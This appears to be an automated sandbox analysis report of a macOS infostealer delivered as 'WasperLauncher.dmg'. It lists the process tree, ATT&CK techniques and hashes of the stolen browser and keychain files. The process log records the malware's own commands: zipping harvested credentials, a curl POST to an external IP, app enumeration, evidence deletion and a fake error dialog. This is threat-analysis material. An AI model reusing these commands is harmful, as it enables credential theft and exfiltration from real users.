"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=124"
3⤵
PID:652

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=123"
3⤵
PID:653

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.4946C3DC-F8D7-4FBF-A05B-47F3AEF0B3D0
3⤵
PID:654

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
3⤵
PID:654

/bin/sh
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/84935461 /Users/run/84935461.zip --norsrc --noextattr"
3⤵
PID:655

/bin/bash
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/84935461 /Users/run/84935461.zip --norsrc --noextattr"
3⤵
PID:655

/usr/bin/ditto
ditto -c -k --sequesterRsrc --keepParent /Users/run/84935461 /Users/run/84935461.zip --norsrc --noextattr
3⤵
PID:655

/bin/sh
sh -c "curl -X POST 'http://147.45.43.136/joinsystem' -H 'Content-Type: multipart/form-data' -F 'BuildID=TcDnhZU-Yn6s/UaEXvU6ow-2-rvmhop4U1Yg3mNoyhM=' -F 'user=bDm1CxKm7XSFUQ3Zr057Ay2/gwd3vKe-3g7Iv0HNqFA=' -F 'B64=@/tmp/b64data_1721492967' -F 'cl=0' -F 'cn=0' --progress-bar"
3⤵
PID:656

/bin/bash
sh -c "curl -X POST 'http://147.45.43.136/joinsystem' -H 'Content-Type: multipart/form-data' -F 'BuildID=TcDnhZU-Yn6s/UaEXvU6ow-2-rvmhop4U1Yg3mNoyhM=' -F 'user=bDm1CxKm7XSFUQ3Zr057Ay2/gwd3vKe-3g7Iv0HNqFA=' -F 'B64=@/tmp/b64data_1721492967' -F 'cl=0' -F 'cn=0' --progress-bar"
3⤵
PID:656

/usr/bin/curl
curl -X POST http://147.45.43.136/joinsystem -H "Content-Type: multipart/form-data" -F "BuildID=TcDnhZU-Yn6s/UaEXvU6ow-2-rvmhop4U1Yg3mNoyhM=" -F "user=bDm1CxKm7XSFUQ3Zr057Ay2/gwd3vKe-3g7Iv0HNqFA=" -F "B64=@/tmp/b64data_1721492967" -F "cl=0" -F "cn=0" --progress-bar
3⤵
PID:656

/bin/sh
sh -c "mdfind \"kMDItemContentType == 'com.apple.application-bundle' && kMDItemKind != 'System'\" | grep -v '/System' | xargs -I % basename \"%\""
3⤵
PID:657

/bin/bash
sh -c "mdfind \"kMDItemContentType == 'com.apple.application-bundle' && kMDItemKind != 'System'\" | grep -v '/System' | xargs -I % basename \"%\""
3⤵
PID:657

/usr/bin/mdfind
mdfind "kMDItemContentType == 'com.apple.application-bundle' && kMDItemKind != 'System'"
4⤵
PID:658

/usr/bin/grep
grep -v /System
4⤵
PID:659

/usr/bin/xargs
xargs -I "%" basename "%"
4⤵
PID:660

/usr/local/bin/basename
basename "/Applications/Google Chrome.app"
3⤵
PID:661

/usr/bin/basename
basename "/Applications/Google Chrome.app"
3⤵
PID:661

/usr/local/bin/basename
basename "/Library/Application Support/Google/GoogleUpdater/128.0.6537.0/GoogleUpdater.app"
3⤵
PID:662

/usr/bin/basename
basename "/Library/Application Support/Google/GoogleUpdater/128.0.6537.0/GoogleUpdater.app"
3⤵
PID:662

/usr/local/bin/basename
basename "/Applications/Firefox Developer Edition.app"
3⤵
PID:663

/usr/bin/basename
basename "/Applications/Firefox Developer Edition.app"
3⤵
PID:663

/usr/local/bin/basename
basename /Applications/OneDrive.app
3⤵
PID:664

/usr/bin/basename
basename /Applications/OneDrive.app
3⤵
PID:664

/usr/local/bin/basename
basename /Applications/Safari.app
3⤵
PID:665

/usr/bin/basename
basename /Applications/Safari.app
3⤵
PID:665

/usr/local/bin/basename
basename /Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.7/Resources/Python.app
3⤵
PID:666

/usr/bin/basename
basename /Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.7/Resources/Python.app
3⤵
PID:666

/usr/local/bin/basename
basename "/usr/local/Cellar/[email protected]/3.9.7_1/Python Launcher 3.app"
3⤵
PID:667

/usr/bin/basename
basename "/usr/local/Cellar/[email protected]/3.9.7_1/Python Launcher 3.app"
3⤵
PID:667

/usr/local/bin/basename
basename "/usr/local/Cellar/[email protected]/3.9.7_1/IDLE 3.app"
3⤵
PID:668

/usr/bin/basename
basename "/usr/local/Cellar/[email protected]/3.9.7_1/IDLE 3.app"
3⤵
PID:668

/usr/local/bin/basename
basename "/usr/local/Cellar/[email protected]/3.9.7_1/Frameworks/Python.framework/Versions/3.9/Resources/Python.app"
3⤵
PID:669

/usr/bin/basename
basename "/usr/local/Cellar/[email protected]/3.9.7_1/Frameworks/Python.framework/Versions/3.9/Resources/Python.app"
3⤵
PID:669

/usr/local/bin/basename
basename "/Library/Application Support/Microsoft/MAU2.0/Microsoft AutoUpdate.app"
3⤵
PID:670

/usr/bin/basename
basename "/Library/Application Support/Microsoft/MAU2.0/Microsoft AutoUpdate.app"
3⤵
PID:670

/usr/local/bin/basename
basename "/Applications/Microsoft Outlook.app"
3⤵
PID:671

/usr/bin/basename
basename "/Applications/Microsoft Outlook.app"
3⤵
PID:671

/usr/local/bin/basename
basename "/Applications/Microsoft OneNote.app"
3⤵
PID:672

/usr/bin/basename
basename "/Applications/Microsoft OneNote.app"
3⤵
PID:672

/usr/local/bin/basename
basename "/Applications/Microsoft Excel.app"
3⤵
PID:673

/usr/bin/basename
basename "/Applications/Microsoft Excel.app"
3⤵
PID:673

/usr/local/bin/basename
basename "/Applications/Microsoft Word.app"
3⤵
PID:674

/usr/bin/basename
basename "/Applications/Microsoft Word.app"
3⤵
PID:674

/usr/local/bin/basename
basename "/Applications/Microsoft PowerPoint.app"
3⤵
PID:675

/usr/bin/basename
basename "/Applications/Microsoft PowerPoint.app"
3⤵
PID:675

/usr/local/bin/basename
basename "/Library/Image Capture/Devices/EPSON Scanner.app"
3⤵
PID:676

/usr/bin/basename
basename "/Library/Image Capture/Devices/EPSON Scanner.app"
3⤵
PID:676

/usr/local/bin/basename
basename /Library/Scripts/ColorSync/Remove.app
3⤵
PID:677

/usr/bin/basename
basename /Library/Scripts/ColorSync/Remove.app
3⤵
PID:677

/usr/local/bin/basename
basename /Library/Scripts/ColorSync/Proof.app
3⤵
PID:678

/usr/bin/basename
basename /Library/Scripts/ColorSync/Proof.app
3⤵
PID:678

/usr/local/bin/basename
basename /Library/Scripts/ColorSync/Match.app
3⤵
PID:679

/usr/bin/basename
basename /Library/Scripts/ColorSync/Match.app
3⤵
PID:679

/usr/local/bin/basename
basename /Library/Scripts/ColorSync/Embed.app
3⤵
PID:680

/usr/bin/basename
basename /Library/Scripts/ColorSync/Embed.app
3⤵
PID:680

/usr/local/bin/basename
basename /Library/Scripts/ColorSync/Extract.app
3⤵
PID:681

/usr/bin/basename
basename /Library/Scripts/ColorSync/Extract.app
3⤵
PID:681

/usr/local/bin/basename
basename "/Library/Scripts/ColorSync/Show Info.app"
3⤵
PID:682

/usr/bin/basename
basename "/Library/Scripts/ColorSync/Show Info.app"
3⤵
PID:682

/usr/local/bin/basename
basename /Library/Scripts/ColorSync/Rename.app
3⤵
PID:683

/usr/bin/basename
basename /Library/Scripts/ColorSync/Rename.app
3⤵
PID:683

/usr/local/bin/basename
basename "/Library/Scripts/ColorSync/Set Info.app"
3⤵
PID:684

/usr/bin/basename
basename "/Library/Scripts/ColorSync/Set Info.app"
3⤵
PID:684

/usr/local/bin/basename
basename "/Library/Printers/EPSON/Fax/Utility/Fax Receive Monitor.app"
3⤵
PID:685

/usr/bin/basename
basename "/Library/Printers/EPSON/Fax/Utility/Fax Receive Monitor.app"
3⤵
PID:685

/usr/local/bin/basename
basename "/Library/Printers/EPSON/Fax/Utility/FAX Utility.app"
3⤵
PID:686

/usr/bin/basename
basename "/Library/Printers/EPSON/Fax/Utility/FAX Utility.app"
3⤵
PID:686

/usr/local/bin/basename
basename /Library/Printers/EPSON/Fax/AutoSetupTool/EPFaxAutoSetupTool.app
3⤵
PID:687

/usr/bin/basename
basename /Library/Printers/EPSON/Fax/AutoSetupTool/EPFaxAutoSetupTool.app
3⤵
PID:687

/usr/local/bin/basename
basename /Library/Printers/EPSON/Fax/Filter/rastertoepfax.app
3⤵
PID:688

/usr/bin/basename
basename /Library/Printers/EPSON/Fax/Filter/rastertoepfax.app
3⤵
PID:688

/usr/local/bin/basename
basename /Library/Printers/EPSON/Fax/Filter/commandFilter.app
3⤵
PID:689

/usr/bin/basename
basename /Library/Printers/EPSON/Fax/Filter/commandFilter.app
3⤵
PID:689

/usr/local/bin/basename
basename /Library/Printers/EPSON/Fax/FaxIOSupport/epsonfax.app
3⤵
PID:690

/usr/bin/basename
basename /Library/Printers/EPSON/Fax/FaxIOSupport/epsonfax.app
3⤵
PID:690

/usr/local/bin/basename
basename "/Library/Application Support/Script Editor/Templates/Cocoa-AppleScript Applet.app"
3⤵
PID:691

/usr/bin/basename
basename "/Library/Application Support/Script Editor/Templates/Cocoa-AppleScript Applet.app"
3⤵
PID:691

/usr/local/bin/basename
basename "/Library/Application Support/Script Editor/Templates/Droplets/Recursive Image File Processing Droplet.app"
3⤵
PID:692

/usr/bin/basename
basename "/Library/Application Support/Script Editor/Templates/Droplets/Recursive Image File Processing Droplet.app"
3⤵
PID:692

/usr/local/bin/basename
basename "/Library/Application Support/Script Editor/Templates/Droplets/Droplet with Settable Properties.app"
3⤵
PID:693

/usr/bin/basename
basename "/Library/Application Support/Script Editor/Templates/Droplets/Droplet with Settable Properties.app"
3⤵
PID:693

/usr/local/bin/basename
basename "/Library/Application Support/Script Editor/Templates/Droplets/Recursive File Processing Droplet.app"
3⤵
PID:694

/usr/bin/basename
basename "/Library/Application Support/Script Editor/Templates/Droplets/Recursive File Processing Droplet.app"
3⤵
PID:694

/usr/local/bin/basename
basename "/Library/Image Capture/Devices/Canon IJScanner2.app"
3⤵
PID:695

/usr/bin/basename
basename "/Library/Image Capture/Devices/Canon IJScanner2.app"
3⤵
PID:695

/usr/local/bin/basename
basename "/Library/Image Capture/Devices/Canon IJScanner6.app"
3⤵
PID:696

/usr/bin/basename
basename "/Library/Image Capture/Devices/Canon IJScanner6.app"
3⤵
PID:696

/usr/local/bin/basename
basename "/Library/Image Capture/Devices/Canon IJScanner4.app"
3⤵
PID:697

/usr/bin/basename
basename "/Library/Image Capture/Devices/Canon IJScanner4.app"
3⤵
PID:697

/usr/local/bin/basename
basename "/Library/Image Capture/Support/LegacyDeviceDiscoveryHelpers/AirScanLegacyDiscovery.app"
3⤵
PID:698

/usr/bin/basename
basename "/Library/Image Capture/Support/LegacyDeviceDiscoveryHelpers/AirScanLegacyDiscovery.app"
3⤵
PID:698

/bin/sh
sh -c "rm -rf /Users/run/84935461"
3⤵
PID:702

/bin/bash
sh -c "rm -rf /Users/run/84935461"
3⤵
PID:702

/bin/rm
rm -rf /Users/run/84935461
3⤵
PID:702

/bin/sh
sh -c "rm /Users/run/84935461.zip"
3⤵
PID:703

/bin/bash
sh -c "rm /Users/run/84935461.zip"
3⤵
PID:703

/bin/rm
rm /Users/run/84935461.zip
3⤵
PID:703

/bin/sh
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
3⤵
PID:704

/bin/bash
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
3⤵
PID:704

/usr/bin/osascript
osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"
3⤵
PID:704

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=124"
3⤵
PID:705

/usr/libexec/xpcproxy
xpcproxy com.apple.mobile.keybagd
3⤵
PID:706

/usr/libexec/keybagd
/usr/libexec/keybagd -t 15
3⤵
PID:706

/usr/libexec/xpcproxy
xpcproxy com.apple.newsyslog
3⤵
PID:707

/usr/sbin/newsyslog
/usr/sbin/newsyslog
3⤵
PID:707

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

AppleScript

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Indicator Removal

T1070

File Deletion

T1070.004

Hide Artifacts

T1564

Resource Forking

T1564.009

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

File and Directory Discovery

T1083

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/./84935461/Chromium/Chrome/Autofill0
Filesize
90KB

MD5
4e9060f76c1cb5b54005dc6640a58f0d

SHA1
04a1e6791ae55612d9b63f23ccb37eec398b3d27

SHA256
5b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3

SHA512
be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148

Download Submit
/Users/run/./84935461/Chromium/Chrome/Cookies2
Filesize
20KB

MD5
2a3fa78b5f55b529a2698ad187c80204

SHA1
cbbda35512038de511ac23b0aed12e9e86bcc796

SHA256
d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b

SHA512
e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab

Download Submit
/Users/run/./84935461/Chromium/Chrome/Password1
Filesize
40KB

MD5
b6914d8e5cb470236eceed8d6f8b4fb7

SHA1
cdff8880e9fa7630fc8d57af4669365b5ab29b60

SHA256
45bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1

SHA512
1c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7

Download Submit
/Users/run/./84935461/Gecko/Firefox/Cookies0
Filesize
96KB

MD5
7357bcc0190ae9659f882b67dc9f5627

SHA1
3085ef48c757fd6e21f93ed4bf061b22557f49de

SHA256
86e8e7c7bcc0b1c022693bdccdb116410eb8fac871a21e49be995be9642797db

SHA512
3f93e76133598fa537576237c1198538861e614e5bc8e50549992b8885d493c385733a7f47c6d18c0d90a9ecd9b6b265bd4fd9c25be83224d5b5baa6c0828c91

Download Submit
/Users/run/./84935461/Gecko/Firefox/key4.db0
Filesize
288KB

MD5
763672d5661fe90693d534d4a530433e

SHA1
ba08498d654b7d31e5734d402a39dbcdae166aa2

SHA256
2215c35a60e7e20045bef30c3e6658f7218115d433212057238dfe50bdadd113

SHA512
420819dd1d4851e879959360ada4e1623666117c867394d972ccb77c572992b1368e0bcc2a8142248c49664681bfc43fc8a0f6e6c8490a44438833a83c3910ae

Download Submit
/Users/run/./84935461/Sysinfo.txt
Filesize
1KB

MD5
31717a21202f4dbab34a72c86ae4f3f2

SHA1
78fab4a3136000513a8f66f2d81d19cb2473338d

SHA256
6e50323737f1ebceb1d9f4e1fb36e5b02ff684de7711f54df08128e966f130da

SHA512
4c79b4b4705b897f2e43aec1ad622df2af929fc58a4e7c44d052b2e39c789bb266d4efc150e00896ac530aede6187c60dba572e78ada2b620f2f4e46f0c6cf5c

Download Submit
/Users/run/./84935461/login-keychain
Filesize
112KB

MD5
f4b94695f664d0767c04edf108dfa91c

SHA1
388de71b8fecbe0bd9d795982d5bdbd3ade8e40c

SHA256
9a806ad6534194d6b526b4b63fa9f8547365a3a43f7e59ad5e32e60d9957ab60

SHA512
28008231a1ba6f7f776545b729da3876ef307a723f2e631b91fa634b7bd1c5c6ed83f1b2c05cd358ee90c837b442e96efa510f0557235eb5209397ebb78017cd

Download Submit
/Users/run/./84935461/password-entered
Filesize
4B

MD5
63a9f0ea7bb98050796b649e85481845

SHA1
dc76e9f0c0006e8f919e0c515c66dbba3982f785

SHA256
4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2

SHA512
99adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8

Download Submit
/Users/run/Downloads/Unconfirmed 666581.crdownload
Filesize
79KB

MD5
f3d9bd3196cf9b349961d432f25b1dee

SHA1
eaa780a198718248b7c186d62254a707fa5fb212

SHA256
91f5704f014f8e4835fbadf1a1e28cdff2de9821cc9d11340174673adacab94a

SHA512
8f4b002dac63be6260f788a897288e48f963d2001f281533a28a383b4f5eeeef8a522ef33a4c3783de2344f95a5fd5c7fcd8a1c60566c32d411aa6db6e843a7c

Download Submit
/Users/run/Downloads/WasperLauncher.dmg
Filesize
643KB

MD5
e0fc6a2169a6990c2e1cce3c4f49cda1

SHA1
a9b0028cdcb3959f7ef3c77febe4aa5089c171e6

SHA256
fba877519e636af85688e079d37cbdb94052de6ab01711321a20cd823bb09ecc

SHA512
cf832c4055bc1c0935c62af305567eeb91668d91f4c4a8dc8149301553d77d08b65e4912c339c1a1a59da7e764ba0aed72baecdb43671e51578330687e280959

Download Submit
/Users/run/Library/Keychains/login.keychain-db
Filesize
114KB

MD5
c60181592e3e51381cb8718f4538b27e

SHA1
c6c0e0f94cbf1bc9088b1737145f34ed2008ef76

SHA256
9d9608da9f78141accb5caae1c2ce4cd2551a1b0ec1638609546a88992532729

SHA512
7d6cf914b1031b3c94b09bb2646c191e4d0cedeb0bec5a8f82901fc911c641a1affe5e4e804328c4ad99a16420ce02a95fd435a0cf6d34856fc59b94a1a3c115

Download Submit
/Users/run/Library/Keychains/login.keychain-db
Filesize
114KB

MD5
e4b24cec3f965f3c99e6f0848862d075

SHA1
fc10be7eaba7a421ab935cb192153f44e096ed20

SHA256
fead21f074e2ded21e25ff8a95c6c35867ad73b493d32ee65d226d15abe5b2fd

SHA512
6a0693d0a1f87a371b0ea2bc30f6dffa7eb480e1f707bb7db03efea04a02cb1166316c6d67552a7e40af6ea8051be6855ab3ba45f7f24be29826153cb66d1889

Download Submit
/Users/run/Library/Keychains/login.keychain-db
Filesize
112KB

MD5
2886bd3973f3b95552831ed7d740eeaf

SHA1
f353da08f12743504bc6eeeae10b44f4a9934460

SHA256
36067636445451d2f648823f966989f1b13e5a50f84b7c00db65b0eb591c09fe

SHA512
25730098cd7dd79c793844d319bf930ac105c25b358dced56a5ff4cec470514d3fe74514a28b9820f41bb11ef79e3a8bb7d2937ae1c114e62e2d308b705a8da8

Download Submit
/Users/run/Library/Keychains/login.keychain-db
Filesize
114KB

MD5
08aa44c2b5a383a1681880cec7e9e16d

SHA1
da1316630b374167c944dc90b8796f593f4793f0

SHA256
53812a4fab86534233e7008d877b22056b2f1f3a6c450a8e12d3b219e6208360

SHA512
7a064eb9327d375f80707bb37f7da57bebcf5eb108e58a326da48e0a3c40417e1357d953b7c808fc1d9807edbbaf83a7e0d2aaddbd7bd24507774bfda52577cd

Download Submit
/Users/run/Library/Keychains/login.keychain-db
Filesize
114KB

MD5
a74a836e4d934cf5c26f5a98131a56f9

SHA1
f1646a628becd6c229fa8e8d449481ef5082624d

SHA256
e5acadad2ff521a19b70b25ba6d72ce2409b68dccf6cf76c9686cc42dc348edd

SHA512
2e0d9438bc217822f7fd4231e9b500039e7cf6dccd7b657f39b32b18f507c0f3761bc846e2ae6e47ab158e5a085b3200c362b51aaf0d560e259479320b3fd941

Download Submit
/Users/run/Library/Keychains/login.keychain-db
Filesize
112KB

MD5
e6660623e1cb5c95fa4cf2bf48125fd3

SHA1
206f28fdabcb01637958ad92f3aa0697f36d1da0

SHA256
b3b8f2a5b3a4f4c38e337ef734e178071e68a575da7d8d88188265b31ff3fc37

SHA512
437fae7e8d65c78307479dd0bb2c79e1042ffcac1c30fd1d9449015e060c18ad4067fd32cb610a26a2e184cf637621755406c1d2772b92cbf8107aef0f0d66be

Download Submit
/private/var/db/spindump/tailspin-trace.2024-07-20_09-29-07.tailspin
Filesize
16.1MB

MD5
2ad0ddd6f2ead96d937bf48a1b113cd6

SHA1
b6349de46b8054ffa09bdb123403eafb22d0215c

SHA256
b9c57f4fdfb3778a5d3d541a79a61965266a00a5c7b868a047cd9227e20096d4

SHA512
33a6afbf52b9b2f0d0900d4c90af55443a1c44e0dc6239c69f9a194813f352e26e98b6f292f0e45ff130474f14c358dfc4cbb140f220d4ff808cb8655e1dcbfc

Download Submit
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/scoped_dirTFzYxI/CRX_INSTALL/images/icon_128.png
Filesize
3KB

MD5
30899b6c4e4a757b8ec6dd2208acdfb4

SHA1
f2c5880a724c6d75cce1b5191e0d82c3bc7de768

SHA256
4f17efbd974a41d88cb36567aab6bf4586579e78780f00b1826676819e14bff4

SHA512
58539e3f0ad7fef30792efcdbbd955599e11e4261c9946e7c3dff6267e01747354ea3b901c46fc8329f81c68afbeb2d05fe3fcb266bc5948de8befa5b8d040ee

Download Submit
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/scoped_dirTFzYxI/CRX_INSTALL/images/icon_16.png
Filesize
531B

MD5
344554d96e418120bd80ef5de5194697

SHA1
23e141c3a6ce368acc1c299f062ab85914bcb17e

SHA256
0a4bd08db6422f8e7a8a218ef39c1b99a5a675f12697f26be88f9afc2e1f9378

SHA512
7ae38853e5acca479d7fd81d48bb88c671cf4dce63342209bcff045ac581a04b7b0ed48f6c58253db950935c0522caaa4fbc6cf5a25151a8960ba56fc804569e

Download Submit
/private/var/root/Library/Application Support/Google/Chrome/Default/Extensions/nmmhkkegccagdldgiimedpiccmgmieda/1.0.0.6_1/craw_background.js
Filesize
531KB

MD5
6eebed29e6a6301e92a9b8b347807f5f

SHA1
65dfb69b650560551110b33dcba50b25e5b876de

SHA256
04cd9494b0ed83924dad12202630b20d053d9e2819c8e826a386c814cc0a1697

SHA512
fede6db31f2ad242e7bc7b52a8859ba7f466a0b920a8dadcb32dcfb5b2a2742e98b767ff22e0c5bc5c11fec021240aa9e458486c9039eb4ebe5cf6af7be97bf2

Download Submit
/tmp/com.google.Keystone/.keystone_system_install_lock
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.0VHhBB/jflookgnkcckhobaglndicnbbgbonegd_3035_all_acdpbm3yzjg2kr45hmepj36qarca.crx3
Filesize
72KB

MD5
0bc987f570d6c413708d781ae78db0af

SHA1
4ac38af20a37e16d72801cbb8886d5edd688f337

SHA256
222f02bbc30fdb09033dc71dd700e02d4b45fcdc4a3d4e4e7638c8b7f3a61c4e

SHA512
46f7cd0a830c5260908bdacddceb2f6b1dacc0f8b5d02a6013db1e0f469bff9d722843d8d86ee8894eca28bb74635ffad28c0f314ec87d53ebc0e38eba2af4f2

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.5T7qT5/imefjhfbkmcmebodilednhmaccmincoa_29.0_mac_bfqwqczv2chgncq7qnwqjby3my.crx3
Filesize
2.4MB

MD5
0fa505d26fd906c645e60aa05f12af36

SHA1
ecb1def63dba6d475dcd61c4d3a6938855e6f24a

SHA256
9738a550f51cdfb80146b1620b40a37d58c5136254ee1f0f03c20a864fab89d2

SHA512
6c49784a21465a2b7348720003f072a279a7aaeb88783b98cdb968a54cb1ce6771122a6f1bbbfb8dd36507576c81d6caa000166f2dc0f81a3feca4e8d5131a00

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.FojKHS/npdjjkjlcidkjlamlmmdelcjbcpdjocm_1.3.19.240_mac_adygwryqqyfdwvvjh32xxi6rilea.crx3
Filesize
3.3MB

MD5
91a8d56c19e60520cf00b78a506b87f0

SHA1
a794be44a680983ac0f87b1faedf064a65016623

SHA256
b158d145928f6c80d855f1fcc5b6813e73b7e14327d65fa9abb26c438e56bf29

SHA512
efe8b3be1ff7c30596230e091a5109b1328b3f603a4f3cad134ad99cf648b8b3a0dbdd79413f854a53dae4e1316862c6b6798660dd9f37283a97115905c65d06

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.GRYhKh/gcmjkmgdlgnkkcocmoeiminaijmmjnii_9.49.1_all_ixzyrcu7pvmgu5pjv6enfqq6wa.crx3
Filesize
34KB

MD5
2db7e78c310ca8e73c069a604eac4d99

SHA1
a6d1e03514f8eba03ab81f1380fc54aaded823b6

SHA256
cd1978742a4afdbaaa15bf712d5c90bef4144caa99024df98f6a9ad58043ae85

SHA512
681eaddbf304f4513b008b98493272b44815460568876b93528851ff7806775de38e6ec588fe27a2cf3dc804415e83a420e45d754b25ad4bdf68ef2c78403aa3

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.Qmbmhx/ggkkehgbnfjpeggfpleeakpidbkibbmn_2022.10.19.1145_all_ac7cecrzrmfngskhgmtk6zmhfjoa.crx3
Filesize
10KB

MD5
cb79d407a4d6d8526b42060b9210b5c2

SHA1
331e3d66e82e130042897faf86dcbd05d7b227f1

SHA256
e3a7322843834a5270a01c56533a34a24b1a253e3bda6f14046e10d818446165

SHA512
0ea283f2077ff874e1f2518565497864b11fd8a65f03d65e2b2996048bdba19849fcab81d9a8220cd51d4a09741b9cf222b1393f6ea4fde6db76dfe0590efdf9

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.SDBvnp/dhlpobdgcjafebgbbhjdnapejmpkgiie_20220505_all_adfdqqtvlhuhhtrt6irlkpynghca.crx3
Filesize
136KB

MD5
667e9eec04509aa9e2b318f580addd8c

SHA1
346267ecad10c54de52a3aeb766ea72449500326

SHA256
0c24e9bd976adffa987e08fc54dc0950c84cf18f9cdb4c5caabc6acf24887c4f

SHA512
a9d22d49290c164abf36dd7e887063ccdd2bf508eb2d16bbac6de749e5152805ecb38ca39352706150de29a76839fa6a56c084ea4f2757b61887b3a7912be917

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.X2CeCn/efniojlnjndmcbiieegkicadnoecjjef_1019_all_i742whxl46i5ojwstwfrofp4hq.crx3
Filesize
150KB

MD5
39e6ea06d86775c4c3a6e110221cb462

SHA1
1834d667a3086d62a2db809e05e8007c5a61dfba

SHA256
76c0533277e360e1431ed04c8c56b5b29792a3f6b32b6453010491926aaf7a85

SHA512
cdeec2b1e25f3283608b0ba49f8c3fb97a4b22f75aa1345279e5d15caab4befd1151437e00237ce77e50919ee518b512e4f3567c125a97a38ef51e9d49b24347

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.iHM8Vf/7_all_sslErrorAssistant.crx3
Filesize
5KB

MD5
636c653ec2c30bb767533901a18669b2

SHA1
4b5a01cfea4c5deb62f3aafa01ef24265613b844

SHA256
3eb16d6c28b502ac4cfee8f4a148df05f4d93229fa36a71db8b08d06329ff18a

SHA512
a4128fb20a5df9e573e92b45f5bc18dcdf4be6e7e39172d08847882f17361320141e89b35deef337e40c365d6f1ccdd1b991eb4593d805dfa2e39a5257c335ee

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.jXALA2/laoigpblnllgcgjnjnllmfolckpjlhki_1.0.7.1652906823_all_jtggsagwbg7dhs53nvq4e53lva.crx3
Filesize
10KB

MD5
91e1255f92fc76b16509bbd174a992b5

SHA1
44cbc6b7b60470149850d375f2e2ae95cf1c012b

SHA256
29661be65c8fb50d3d4df2fe040a1cc6dd525f50a95850aae6a191301c3de744

SHA512
